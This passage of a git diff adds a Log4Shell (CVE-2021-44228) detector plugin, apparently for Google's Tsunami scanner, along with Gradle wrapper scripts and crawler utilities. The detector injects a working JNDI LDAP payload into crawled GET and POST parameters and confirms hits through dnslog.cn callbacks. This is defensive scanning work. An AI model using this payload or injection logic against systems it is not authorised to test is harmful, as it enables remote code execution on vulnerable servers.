+        CHECK2=`echo "$arg"|egrep -c "^-"`                                 ### Determine if an option
+
+        if [ $CHECK -ne 0 ] && [ $CHECK2 -eq 0 ] ; then                    ### Added a condition
+            eval `echo args$i`=`cygpath --path --ignore --mixed "$arg"`
+        else
+            eval `echo args$i`="\"$arg\""
+        fi
+        i=`expr $i + 1`
+    done
+    case $i in
+        0) set -- ;;
+        1) set -- "$args0" ;;
+        2) set -- "$args0" "$args1" ;;
+        3) set -- "$args0" "$args1" "$args2" ;;
+        4) set -- "$args0" "$args1" "$args2" "$args3" ;;
+        5) set -- "$args0" "$args1" "$args2" "$args3" "$args4" ;;
+        6) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" ;;
+        7) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" "$args6" ;;
+        8) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" "$args6" "$args7" ;;
+        9) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" "$args6" "$args7" "$args8" ;;
+    esac
+fi
+
+# Escape application args
+save () {
+    for i do printf %s\\n "$i" | sed "s/'/'\\\\''/g;1s/^/'/;\$s/\$/' \\\\/" ; done
+    echo " "
+}
+APP_ARGS=`save "$@"`
+
+# Collect all arguments for the java command, following the shell quoting and substitution rules
+eval set -- $DEFAULT_JVM_OPTS $JAVA_OPTS $GRADLE_OPTS "\"-Dorg.gradle.appname=$APP_BASE_NAME\"" -classpath "\"$CLASSPATH\"" org.gradle.wrapper.GradleWrapperMain "$APP_ARGS"
+
+exec "$JAVACMD" "$@"
diff --git a/community/detectors/log4j_rce/gradlew.bat b/community/detectors/log4j_rce/gradlew.bat
new file mode 100644
index 000000000..5093609d5
--- /dev/null
+++ b/community/detectors/log4j_rce/gradlew.bat
@@ -0,0 +1,104 @@
+@rem
+@rem Copyright 2015 the original author or authors.
+@rem
+@rem Licensed under the Apache License, Version 2.0 (the "License");
+@rem you may not use this file except in compliance with the License.
+@rem You may obtain a copy of the License at
+@rem
+@rem      https://www.apache.org/licenses/LICENSE-2.0
+@rem
+@rem Unless required by applicable law or agreed to in writing, software
+@rem distributed under the License is distributed on an "AS IS" BASIS,
+@rem WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+@rem See the License for the specific language governing permissions and
+@rem limitations under the License.
+@rem
+
+@if "%DEBUG%" == "" @echo off
+@rem ##########################################################################
+@rem
+@rem  Gradle startup script for Windows
+@rem
+@rem ##########################################################################
+
+@rem Set local scope for the variables with windows NT shell
+if "%OS%"=="Windows_NT" setlocal
+
+set DIRNAME=%~dp0
+if "%DIRNAME%" == "" set DIRNAME=.
+set APP_BASE_NAME=%~n0
+set APP_HOME=%DIRNAME%
+
+@rem Resolve any "." and ".." in APP_HOME to make it shorter.
+for %%i in ("%APP_HOME%") do set APP_HOME=%%~fi
+
+@rem Add default JVM options here. You can also use JAVA_OPTS and GRADLE_OPTS to pass JVM options to this script.
+set DEFAULT_JVM_OPTS="-Xmx64m" "-Xms64m"
+
+@rem Find java.exe
+if defined JAVA_HOME goto findJavaFromJavaHome
+
+set JAVA_EXE=java.exe
+%JAVA_EXE% -version >NUL 2>&1
+if "%ERRORLEVEL%" == "0" goto init
+
+echo.
+echo ERROR: JAVA_HOME is not set and no 'java' command could be found in your PATH.
+echo.
+echo Please set the JAVA_HOME variable in your environment to match the
+echo location of your Java installation.
+
+goto fail
+
+:findJavaFromJavaHome
+set JAVA_HOME=%JAVA_HOME:"=%
+set JAVA_EXE=%JAVA_HOME%/bin/java.exe
+
+if exist "%JAVA_EXE%" goto init
+
+echo.
+echo ERROR: JAVA_HOME is set to an invalid directory: %JAVA_HOME%
+echo.
+echo Please set the JAVA_HOME variable in your environment to match the
+echo location of your Java installation.
+
+goto fail
+
+:init
+@rem Get command-line arguments, handling Windows variants
+
+if not "%OS%" == "Windows_NT" goto win9xME_args
+
+:win9xME_args
+@rem Slurp the command line arguments.
+set CMD_LINE_ARGS=
+set _SKIP=2
+
+:win9xME_args_slurp
+if "x%~1" == "x" goto execute
+
+set CMD_LINE_ARGS=%*
+
+:execute
+@rem Setup the command line
+
+set CLASSPATH=%APP_HOME%\gradle\wrapper\gradle-wrapper.jar
+
+
+@rem Execute Gradle
+"%JAVA_EXE%" %DEFAULT_JVM_OPTS% %JAVA_OPTS% %GRADLE_OPTS% "-Dorg.gradle.appname=%APP_BASE_NAME%" -classpath "%CLASSPATH%" org.gradle.wrapper.GradleWrapperMain %CMD_LINE_ARGS%
+
+:end
+@rem End local scope for the variables with windows NT shell
+if "%ERRORLEVEL%"=="0" goto mainEnd
+
+:fail
+rem Set variable GRADLE_EXIT_CONSOLE if you need the _script_ return code instead of
+rem the _cmd.exe /c_ return code!
+if  not "" == "%GRADLE_EXIT_CONSOLE%" exit 1
+exit /b 1
+
+:mainEnd
+if "%OS%"=="Windows_NT" endlocal
+
+:omega
diff --git a/community/detectors/log4j_rce/settings.gradle b/community/detectors/log4j_rce/settings.gradle
new file mode 100644
index 000000000..f10d75913
--- /dev/null
+++ b/community/detectors/log4j_rce/settings.gradle
@@ -0,0 +1,2 @@
+rootProject.name = 'CVE-2021-44228'
+
diff --git a/community/detectors/log4j_rce/src/main/java/com/google/tsunami/plugins/detectors/cves/cve202144228/Cve202144228DetectorBootstrapModule.java b/community/detectors/log4j_rce/src/main/java/com/google/tsunami/plugins/detectors/cves/cve202144228/Cve202144228DetectorBootstrapModule.java
new file mode 100644
index 000000000..38a1ac761
--- /dev/null
+++ b/community/detectors/log4j_rce/src/main/java/com/google/tsunami/plugins/detectors/cves/cve202144228/Cve202144228DetectorBootstrapModule.java
@@ -0,0 +1,31 @@
+/*
+ * Copyright 2020 Google LLC
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+package com.google.tsunami.plugins.detectors.cves.cve202144228;
+
+import com.google.tsunami.plugin.PluginBootstrapModule;
+import com.google.tsunami.plugins.detectors.cves.cve202144228.crawl.SimpleCrawlerModule;
+
+/**
+ * An CVE-2021-44228 Guice module that bootstraps the {@link Cve202144228VulnDetector}.
+ */
+public final class Cve202144228DetectorBootstrapModule extends PluginBootstrapModule {
+
+  @Override
+  protected void configurePlugin() {
+    install(new SimpleCrawlerModule(/*maxActiveThreads=*/ 8));
+    registerPlugin(Cve202144228VulnDetector.class);
+  }
+}
diff --git a/community/detectors/log4j_rce/src/main/java/com/google/tsunami/plugins/detectors/cves/cve202144228/Cve202144228VulnDetector.java b/community/detectors/log4j_rce/src/main/java/com/google/tsunami/plugins/detectors/cves/cve202144228/Cve202144228VulnDetector.java
new file mode 100644
index 000000000..8e3e2ecf2
--- /dev/null
+++ b/community/detectors/log4j_rce/src/main/java/com/google/tsunami/plugins/detectors/cves/cve202144228/Cve202144228VulnDetector.java
@@ -0,0 +1,374 @@
+/*
+ * Copyright 2020 Google LLC
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+package com.google.tsunami.plugins.detectors.cves.cve202144228;
+
+import static com.google.common.base.Preconditions.checkNotNull;
+import static com.google.common.collect.ImmutableList.toImmutableList;
+import static com.google.common.net.HttpHeaders.COOKIE;
+import static com.google.common.net.HttpHeaders.SET_COOKIE;
+import static com.google.tsunami.common.data.NetworkEndpointUtils.toUriAuthority;
+import static java.nio.charset.StandardCharsets.UTF_8;
+
+import com.google.common.annotations.VisibleForTesting;
+import com.google.common.collect.ImmutableList;
+import com.google.common.collect.ImmutableSet;
+import com.google.common.flogger.GoogleLogger;
+import com.google.protobuf.ByteString;
+import com.google.protobuf.util.Timestamps;
+import com.google.tsunami.common.data.NetworkServiceUtils;
+import com.google.tsunami.common.net.http.HttpClient;
+import com.google.tsunami.common.net.http.HttpHeaders;
+import com.google.tsunami.common.net.http.HttpRequest;
+import com.google.tsunami.common.net.http.HttpResponse;
+import com.google.tsunami.common.net.http.HttpStatus;
+import com.google.tsunami.common.time.UtcClock;
+import com.google.tsunami.plugin.PluginType;
+import com.google.tsunami.plugin.VulnDetector;
+import com.google.tsunami.plugin.annotations.PluginInfo;
+import com.google.tsunami.plugins.detectors.cves.cve202144228.crawl.Crawler;
+import com.google.tsunami.plugins.detectors.cves.cve202144228.crawl.ScopeUtils;
+import com.google.tsunami.proto.CrawlConfig;
+import com.google.tsunami.proto.CrawlResult;
+import com.google.tsunami.proto.DetectionReport;
+import com.google.tsunami.proto.DetectionReportList;
+import com.google.tsunami.proto.DetectionStatus;
+import com.google.tsunami.proto.NetworkService;
+import com.google.tsunami.proto.Severity;
+import com.google.tsunami.proto.TargetInfo;
+import com.google.tsunami.proto.Vulnerability;
+import com.google.tsunami.proto.VulnerabilityId;
+import java.io.IOException;
+import java.io.UnsupportedEncodingException;
+import java.net.URLEncoder;
+import java.time.Clock;
+import java.time.Instant;
+import java.util.ArrayList;
+import java.util.HashMap;
+import java.util.List;
+import java.util.Map;
+import javax.inject.Inject;
+
+/**
+ * A {@link VulnDetector} that detects the CVE-2021-44228 vulnerability.
+ */
+@PluginInfo(
+    type = PluginType.VULN_DETECTION,
+    name = "CVE202144228VulnDetector",
+    version = "0.1",
+    description =
+        "Apache Log4j2 <=2.14.1 JNDI features used in configuration, log messages, and parameters "
+            + "do not protect against attacker controlled LDAP and other JNDI related endpoints. "
+            + "An attacker who can control log messages or log message parameters can execute "
+            + "arbitrary code loaded from LDAP servers when message lookup substitution is enabled."
+            + " From log4j 2.15.0, this behavior has been disabled by default. ",
+    author = "hh-hunter",
+    bootstrapModule = Cve202144228DetectorBootstrapModule.class)
+public final class Cve202144228VulnDetector implements VulnDetector {
+
+  public static String OOB_DOMAIN = "";
+  private static final GoogleLogger logger = GoogleLogger.forEnclosingClass();
+  private static int MAX_TRY_GET_OOB_DOMAIN = 6;
+  private static String PHP_SESSION = "";
+  private static String PAYLOAD = "${jndi:ldap://tsunami.OOB_DOMAIN/}";
+
+  @VisibleForTesting
+  static final String VULN_DESCRIPTION =
+      "Apache Log4j2 <=2.14.1 JNDI features used in configuration, log messages, and parameters do"
+          + " not protect against attacker controlled LDAP and other JNDI related endpoints. An "
+          + "attacker who can control log messages or log message parameters can execute arbitrary"
+          + " code loaded from LDAP servers when message lookup substitution is enabled. From log4j"
+          + " 2.15.0, this behavior has been disabled by default.";
+
+  private final HttpClient httpClient;
+  private final Clock utcClock;
+  private final Crawler crawler;
+
+  @Inject
+  Cve202144228VulnDetector(@UtcClock Clock utcClock, HttpClient httpClient, Crawler crawler) {
+    this.httpClient = checkNotNull(httpClient);
+    this.utcClock = checkNotNull(utcClock);
+    this.crawler = checkNotNull(crawler);
+  }
+
+  @Override
+  public DetectionReportList detect(
+      TargetInfo targetInfo, ImmutableList<NetworkService> matchedServices) {
+    logger.atInfo().log("CVE-2021-44228 starts detecting.");
+    return DetectionReportList.newBuilder()
+        .addAllDetectionReports(
+            matchedServices.stream()
+                .filter(Cve202144228VulnDetector::isWebServiceOrUnknownService)
+                .filter(this::isServiceVulnerable)
+                .map(networkService -> buildDetectionReport(targetInfo, networkService))
+                .collect(toImmutableList()))
+        .build();
+  }
+
+  private boolean isServiceVulnerable(NetworkService networkService) {
+    String startingUrl = buildTargetUrl(networkService, "");
+    ImmutableSet<CrawlResult> crawlResults = crawlNetworkService(startingUrl, networkService);
+    if (crawlResults.size() > 0) {
+      initOOBDomain();
+    }
+    if ("".equals(OOB_DOMAIN)) {
+      return false;
+    }
+
+    for (CrawlResult crawlResult : crawlResults) {
+      if ("GET".equals(crawlResult.getCrawlTargetOrBuilder().getHttpMethod())) {
+        List<String> nextUris = buildNextGetUris(startingUrl,
+            crawlResult.getCrawlTargetOrBuilder().getUrl());
+        if (checkGetVulnerable(networkService, nextUris)) {
+          return true;
+        }
+      }
+      if ("POST".equals(crawlResult.getCrawlTargetOrBuilder().getHttpMethod())) {
+        // todo: getHttpRequestBody is always empty, which may be a bug.
+        logger.atInfo()
+            .log(crawlResult.getCrawlTargetOrBuilder().getHttpRequestBody().toStringUtf8());
+        Map<String, List<String>> nextPostUris = buildNextPostUris(startingUrl,
+            crawlResult.getCrawlTargetOrBuilder().getUrl(),
+            crawlResult.getCrawlTargetOrBuilder().getHttpRequestBody().toStringUtf8());
+        if (checkPostVulnerable(networkService, nextPostUris)) {
+          return true;
+        }
+      }
+    }
+    return false;
+  }
+
+  /**
+   * Check for vulnerabilities using GET method
+   *
+   * @param networkService
+   * @param nextUriList
+   * @return
+   */
+  private boolean checkGetVulnerable(NetworkService networkService, List<String> nextUriList) {
+    return nextUriList.stream().anyMatch(item -> {
+      String targetUrl = buildTargetUrl(networkService, item);
+      try {
+        httpClient.send(HttpRequest.get(targetUrl).withEmptyHeaders().build(), networkService);
+      } catch (IOException e) {
+        logger.atWarning().withCause(e).log("Request to target %s failed", networkService);
+      }
+      return checkOOBData();
+    });
+  }
+
+  /**
+   * Check for vulnerabilities using POST method
+   *
+   * @param networkService
+   * @param nextUriList
+   * @return
+   */
+  private boolean checkPostVulnerable(NetworkService networkService,
+      Map<String, List<String>> nextUriList) {
+    return nextUriList.entrySet().stream().anyMatch(item -> {
+      String uri = item.getKey();
+      List<String> postDataList = nextUriList.get(item.getKey());
+      String targetUrl = buildTargetUrl(networkService, uri);
+      return postDataList.stream().anyMatch(postData -> {
+        try {
+          System.out.println(targetUrl + "\t\t" + postData);
+          httpClient.send(HttpRequest.post(targetUrl).setRequestBody(
+              ByteString.copyFromUtf8(postData)).withEmptyHeaders().build(),
+              networkService);
+        } catch (IOException e) {
+          logger.atWarning().withCause(e).log("Request to target %s failed", networkService);
+        }
+        return checkOOBData();
+      });
+    });
+  }
+
+  public void initOOBDomain() {
+    try {
+      if ("".equals(OOB_DOMAIN)) {
+        HttpResponse response = httpClient
+            .send(HttpRequest.get("http://www.dnslog.cn/getdomain.php").withEmptyHeaders().build());
+        if (HttpStatus.OK.equals(response.status())) {
+          OOB_DOMAIN = response.bodyString().get();
+          PAYLOAD = PAYLOAD.replace("OOB_DOMAIN", OOB_DOMAIN);
+          PHP_SESSION = response.headers().get(SET_COOKIE).get().replace("path=/", "");
+          logger.atInfo().log("Request oob domain %s success", OOB_DOMAIN);
+        }
+      }
+    } catch (IOException e) {
+      if (e.getMessage().contains("timeout") && MAX_TRY_GET_OOB_DOMAIN > 0) {
+        logger.atWarning().log("Request to oob domain timeout,retrying...");
+        MAX_TRY_GET_OOB_DOMAIN = MAX_TRY_GET_OOB_DOMAIN - 1;
+        initOOBDomain();
+      } else {
+        logger.atWarning().withCause(e).log("Request to oob domain failed");
+      }
+    }
+  }
+
+  /**
+   * Check if the oob service has dns requests
+   *
+   * @return
+   */
+  private boolean checkOOBData() {
+    try {
+      MAX_TRY_GET_OOB_DOMAIN = 3;
+      Thread.sleep(10000);
+      // dnslog is not stable
+      HttpResponse response = httpClient
+          .send(HttpRequest.get("http://www.dnslog.cn/getrecords.php").setHeaders(
+              HttpHeaders.builder().addHeader(COOKIE, PHP_SESSION).build()).build());
+      if (HttpStatus.OK.equals(response.status()) && response.bodyString().get()
+          .contains("tsunami")) {
+        return true;
+      }
+    } catch (Exception e) {
+      if (e.getMessage().contains("timeout") && MAX_TRY_GET_OOB_DOMAIN > 0) {
+        logger.atWarning().log("Check oob domain result timeout,retrying...");
+        MAX_TRY_GET_OOB_DOMAIN = MAX_TRY_GET_OOB_DOMAIN - 1;
+        checkOOBData();
+      } else {
+        logger.atWarning().withCause(e).log("Check oob domain result failed");
+      }
+    }
+    return false;
+  }
+
+  /**
+   * Construct a list of URIs to be detected next, replacing the values of the parameters with
+   * payload for the GET method
+   *
+   * @param startingUrl start url
+   * @param url         crawler result url
+   * @return
+   */
+  private Map<String, List<String>> buildNextPostUris(String startingUrl, String url,
+      String postData) {
+    Map<String, List<String>> nextPostDataList = new HashMap<>();
+    List<String> postDataList = new ArrayList<>();
+    try {
+      String[] data = postData.split("&");
+      for (String str : data) {
+        if (str.contains("=") && str.split("=").length == 2) {
+          String strKey = str.split("=")[0];
+          String newData = strKey + "=" + URLEncoder.encode(PAYLOAD, UTF_8.toString());
+          postDataList.add(newData);
+        }
+      }
+    } catch (UnsupportedEncodingException e) {
+      logger.atWarning().withCause(e).log("build target %s next post data failed", url);
+    }
+    List<String> nextPostUris = buildNextGetUris(startingUrl, url);
+    nextPostUris.forEach(postUri -> {
+      nextPostDataList.put(postUri, postDataList);
+    });
+
+    return nextPostDataList;
+  }
+
+  /**
+   * Construct a list of URIs to be detected next, replacing the values of the parameters with
+   * payload for the GET method
+   *
+   * @param startingUrl start url
+   * @param url         crawler result url
+   * @return
+   */
+  private List<String> buildNextGetUris(String startingUrl, String url) {
+    List<String> nextUriList = new ArrayList<>();
+    try {
+      String query = url.replace(startingUrl, "");
+      String[] queryStrings = query.split("&");
+      for (String queryString : queryStrings) {
+        if (queryString.contains("=") && queryString.split("=").length == 2) {
+          String queryStringKey = queryString.split("=")[0];
+          String newQueryString = queryStringKey + "=" +
+              URLEncoder.encode(PAYLOAD, UTF_8.toString());
+          String uri = query.replace(queryString, newQueryString);
+          nextUriList.add(uri);
+        }
+      }
+    } catch (UnsupportedEncodingException e) {
+      logger.atWarning().withCause(e).log("build target %s next get uris failed", url);
+    }
+    return nextUriList;
+  }
+
+  private DetectionReport buildDetectionReport(
+      TargetInfo targetInfo, NetworkService vulnerableNetworkService) {
+    return DetectionReport.newBuilder()
+        .setTargetInfo(targetInfo)
+        .setNetworkService(vulnerableNetworkService)
+        .setDetectionTimestamp(Timestamps.fromMillis(Instant.now(utcClock).toEpochMilli()))
+        .setDetectionStatus(DetectionStatus.VULNERABILITY_VERIFIED)
+        .setVulnerability(
+            Vulnerability.newBuilder()
+                .setMainId(
+                    VulnerabilityId.newBuilder()
+                        .setPublisher("TSUNAMI_COMMUNITY")
+                        .setValue("CVE_2021_44228"))
+                .setSeverity(Severity.CRITICAL)
+                .setTitle("CVE-2021-44228 Apache Log4j2 <=2.14.1 JNDI RCE")
+                .setRecommendation(
+                    "In previous releases (>=2.10) this behavior can be mitigated by setting system"
+                        + " property \"log4j2.formatMsgNoLookups\" to “true” or by removing the "
+                        + "JndiLookup class from the classpath "
+                        + "(example: zip -q -d log4j-core-*.jar "
+                        + "org/apache/logging/log4j/core/lookup/JndiLookup.class). "
+                        + "Java 8u121 (see "
+                        + "https://www.oracle.com/java/technologies/javase/8u121-relnotes.html) "
+                        + "protects against RCE by defaulting "
+                        + "\"com.sun.jndi.rmi.object.trustURLCodebase\" and "
+                        + "\"com.sun.jndi.cosnaming.object.trustURLCodebase\" to \"false\".")
+                .setDescription(VULN_DESCRIPTION))
+        .build();
+  }
+
+  private static boolean isWebServiceOrUnknownService(NetworkService networkService) {
+    return networkService.getServiceName().isEmpty()
+        || NetworkServiceUtils.isWebService(networkService)
+        || NetworkServiceUtils.getServiceName(networkService).equals("unknown");
+  }
+
+  private static String buildTargetUrl(NetworkService networkService, String nextUri) {
+    StringBuilder targetUrlBuilder = new StringBuilder();
+    if (NetworkServiceUtils.isWebService(networkService)) {
+      targetUrlBuilder.append(NetworkServiceUtils.buildWebApplicationRootUrl(networkService));
+    } else {
+      // Assume the service uses HTTP protocol when the scanner cannot identify the actual service.
+      targetUrlBuilder
+          .append("http://")
+          .append(toUriAuthority(networkService.getNetworkEndpoint()))
+          .append("/");
+    }
+    targetUrlBuilder.append(nextUri);
+    return targetUrlBuilder.toString();
+  }
+
+  private ImmutableSet<CrawlResult> crawlNetworkService(String seedingUrl,
+      NetworkService networkService) {
+    CrawlConfig crawlConfig =
+        CrawlConfig.newBuilder()
+            .addScopes(ScopeUtils.fromUrl(seedingUrl))
+            .setShouldEnforceScopeCheck(true)
+            .addSeedingUrls(seedingUrl)
+            .setMaxDepth(10)
+            .setNetworkService(networkService)
+            .build();
+    return crawler.crawl(crawlConfig);
+  }
+}
diff --git a/community/detectors/log4j_rce/src/main/java/com/google/tsunami/plugins/detectors/cves/cve202144228/crawl/CrawlConfigUtils.java b/community/detectors/log4j_rce/src/main/java/com/google/tsunami/plugins/detectors/cves/cve202144228/crawl/CrawlConfigUtils.java
new file mode 100644
index 000000000..945098e1d
--- /dev/null
+++ b/community/detectors/log4j_rce/src/main/java/com/google/tsunami/plugins/detectors/cves/cve202144228/crawl/CrawlConfigUtils.java
@@ -0,0 +1,44 @@
+/*
+ * Copyright 2020 Google LLC
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+package com.google.tsunami.plugins.detectors.cves.cve202144228.crawl;
+
+import static com.google.common.collect.ImmutableList.toImmutableList;
+
+import com.google.tsunami.proto.CrawlConfig;
+import com.google.tsunami.proto.CrawlTarget;
+
+/** Static utility methods pertaining to {@link CrawlConfig} proto buffer. */
+final class CrawlConfigUtils {
+  private CrawlConfigUtils() {}
+
+  static CrawlConfig createDefaultScopesIfAbsent(CrawlConfig crawlConfig) {
+    if (crawlConfig.getScopesCount() > 0) {
+      return crawlConfig;
+    }
+
+    return CrawlConfig.newBuilder(crawlConfig)
+        .addAllScopes(
+            crawlConfig.getSeedingUrlsList().stream()
+                .map(ScopeUtils::fromUrl)
+                .collect(toImmutableList()))
+        .build();
+  }
+
+  static boolean isCrawlTargetInScope(CrawlConfig crawlConfig, CrawlTarget crawlTarget) {
+    return !crawlConfig.getShouldEnforceScopeCheck() || crawlConfig.getScopesList().stream()
+        .anyMatch(scope -> ScopeUtils.isInScope(scope, crawlTarget.getUrl()));
+  }
+}
diff --git a/community/detectors/log4j_rce/src/main/java/com/google/tsunami/plugins/detectors/cves/cve202144228/crawl/CrawlTargetUtils.java b/community/detectors/log4j_rce/src/main/java/com/google/tsunami/plugins/detectors/cves/cve202144228/crawl/CrawlTargetUtils.java
new file mode 100644
index 000000000..38944cf01
--- /dev/null
+++ b/community/detectors/log4j_rce/src/main/java/com/google/tsunami/plugins/detectors/cves/cve202144228/crawl/CrawlTargetUtils.java
@@ -0,0 +1,165 @@
+/*
+ * Copyright 2020 Google LLC
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+package com.google.tsunami.plugins.detectors.cves.cve202144228.crawl;
+
+import static com.google.common.collect.ImmutableSet.toImmutableSet;
+import static com.google.common.net.HttpHeaders.CONTENT_LOCATION;
+import static com.google.common.net.HttpHeaders.LINK;
+import static com.google.common.net.HttpHeaders.LOCATION;
+
+import com.google.common.base.Ascii;
+import com.google.common.base.Strings;
+import com.google.common.collect.ImmutableSet;
+import com.google.tsunami.common.net.http.HttpHeaders;
+import com.google.tsunami.common.net.http.HttpMethod;
+import com.google.tsunami.proto.CrawlTarget;
+import java.util.Optional;
+import java.util.regex.Matcher;
+import java.util.regex.Pattern;
+import okhttp3.HttpUrl;
+import org.jsoup.Jsoup;
+import org.jsoup.nodes.Document;
+import org.jsoup.nodes.Element;
+import org.jsoup.nodes.FormElement;
+
+/** Static utility methods pertaining to {@link CrawlTarget} proto buffer. */
+public final class CrawlTargetUtils {
+  private static final ImmutableSet<String> LINK_ATTRIBUTES =
+      ImmutableSet.of(
+          // HTML 4 link attributes.
+          "action",
+          "archive",
+          "background",
+          "cite",
+          "codebase",
+          "data",
+          "href",
+          "longdesc",
+          "profile",
+          "src",
+          // HTML 5 link attributes.
+          "formaction",
+          "manifest",
+          "poster",
+          "srcdoc",
+          "ping");
+  // URI in LINK header must be present between characters < and >
+  // (https://tools.ietf.org/html/rfc5988#section-5).
+  private static final Pattern LINK_URL_PATTERN = Pattern.compile("<(?<url>[^>]+)>");
+
+  private CrawlTargetUtils() {}
+
+  public static ImmutableSet<CrawlTarget> extractFromHeaders(
+      HttpHeaders httpHeaders, HttpUrl baseUrl) {
+    return httpHeaders.names().stream()
+        .filter(CrawlTargetUtils::isRedirectHeader)
+        .flatMap(
+            headerName ->
+                getUrlsFromHeader(headerName, httpHeaders.getAll(headerName), baseUrl).stream())
+        .map(
+            url ->
+                CrawlTarget.newBuilder()
+                    .setUrl(url.toString())
+                    .setHttpMethod(HttpMethod.GET.toString())
+                    .build())
+        .collect(toImmutableSet());
+  }
+
+  private static boolean isRedirectHeader(String headerName) {
+    return Ascii.equalsIgnoreCase(headerName, LOCATION)
+        || Ascii.equalsIgnoreCase(headerName, CONTENT_LOCATION)
+        || Ascii.equalsIgnoreCase(headerName, LINK);
+  }
+
+  private static ImmutableSet<HttpUrl> getUrlsFromHeader(
+      String headerName, Iterable<String> headerValues, HttpUrl baseUrl) {
+    ImmutableSet.Builder<HttpUrl> urlsBuilder = ImmutableSet.builder();
+
+    if (Ascii.equalsIgnoreCase(headerName, LOCATION)
+        || Ascii.equalsIgnoreCase(headerName, CONTENT_LOCATION)) {
+      for (String headerValue : headerValues) {
+        Optional.ofNullable(baseUrl.resolve(headerValue)).ifPresent(urlsBuilder::add);
+      }
+    }
+
+    if (Ascii.equalsIgnoreCase(headerName, LINK)) {
+      for (String headerValue : headerValues) {
+        Matcher linkUrlMatcher = LINK_URL_PATTERN.matcher(headerValue);
+        while (linkUrlMatcher.find()) {
+          Optional.ofNullable(linkUrlMatcher.group("url"))
+              .flatMap(linkUrl -> Optional.ofNullable(baseUrl.resolve(linkUrl)))
+              .ifPresent(urlsBuilder::add);
+        }
+      }
+    }
+
+    return urlsBuilder.build();
+  }
+
+  /** Extracts all links from an HTML page and wraps them into {@link CrawlTarget} messages. */
+  public static ImmutableSet<CrawlTarget> extractFromHtml(String document, HttpUrl baseUrl) {
+    return extractFromHtml(Jsoup.parse(document), baseUrl);
+  }
+
+  /** Extracts all links from an HTML page and wraps them into {@link CrawlTarget} messages. */
+  public static ImmutableSet<CrawlTarget> extractFromHtml(Document document, HttpUrl baseUrl) {
+    HttpUrl effectiveBaseUrl = effectiveHtmlBaseUrl(document, baseUrl);
+    ImmutableSet.Builder<CrawlTarget> crawlTargetsBuilder = ImmutableSet.builder();
+
+    for (String linkAttr : LINK_ATTRIBUTES) {
+      // Ignore base tags that are handled separately.
+      for (Element matchingElement : document.select(String.format("[%s]:not(base)", linkAttr))) {
+        // Ignore empty links from the HTML document.
+        String linkAttrValue = matchingElement.attr(linkAttr);
+        if (Strings.isNullOrEmpty(linkAttrValue)) {
+          continue;
+        }
+
+        Optional.ofNullable(effectiveBaseUrl.resolve(linkAttrValue))
+            .ifPresent(
+                httpUrl ->
+                    crawlTargetsBuilder.add(
+                        CrawlTarget.newBuilder()
+                            .setHttpMethod(getHttpMethodForLink(matchingElement).toString())
+                            .setUrl(httpUrl.toString())
+                            .build()));
+      }
+    }
+
+    return crawlTargetsBuilder.build();
+  }
+
+  private static HttpUrl effectiveHtmlBaseUrl(Document document, HttpUrl fallbackUrl) {
+    Optional<HttpUrl> baseHref =
+        Optional.ofNullable(document.select("base[href]").first())
+            .flatMap(element -> Optional.ofNullable(HttpUrl.parse(element.attr("href"))));
+
+    if (baseHref.isPresent() && !Strings.isNullOrEmpty(baseHref.get().host())) {
+      return baseHref.get();
+    }
+
+    return fallbackUrl;
+  }
+
+  private static HttpMethod getHttpMethodForLink(Element element) {
+    if (element instanceof FormElement
+        && Ascii.equalsIgnoreCase(element.attr("method"), HttpMethod.POST.toString())) {
+      return HttpMethod.POST;
+    } else {
+      return HttpMethod.GET;
+    }
+  }
+}
diff --git a/community/detectors/log4j_rce/src/main/java/com/google/tsunami/plugins/detectors/cves/cve202144228/crawl/CrawlUtils.java b/community/detectors/log4j_rce/src/main/java/com/google/tsunami/plugins/detectors/cves/cve202144228/crawl/CrawlUtils.java
new file mode 100644
index 000000000..96e55ea60
--- /dev/null
+++ b/community/detectors/log4j_rce/src/main/java/com/google/tsunami/plugins/detectors/cves/cve202144228/crawl/CrawlUtils.java
@@ -0,0 +1,40 @@
+/*
+ * Copyright 2020 Google LLC
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+package com.google.tsunami.plugins.detectors.cves.cve202144228.crawl;
+
+import static com.google.common.net.HttpHeaders.CONTENT_TYPE;
+
+import com.google.tsunami.common.net.http.HttpResponse;
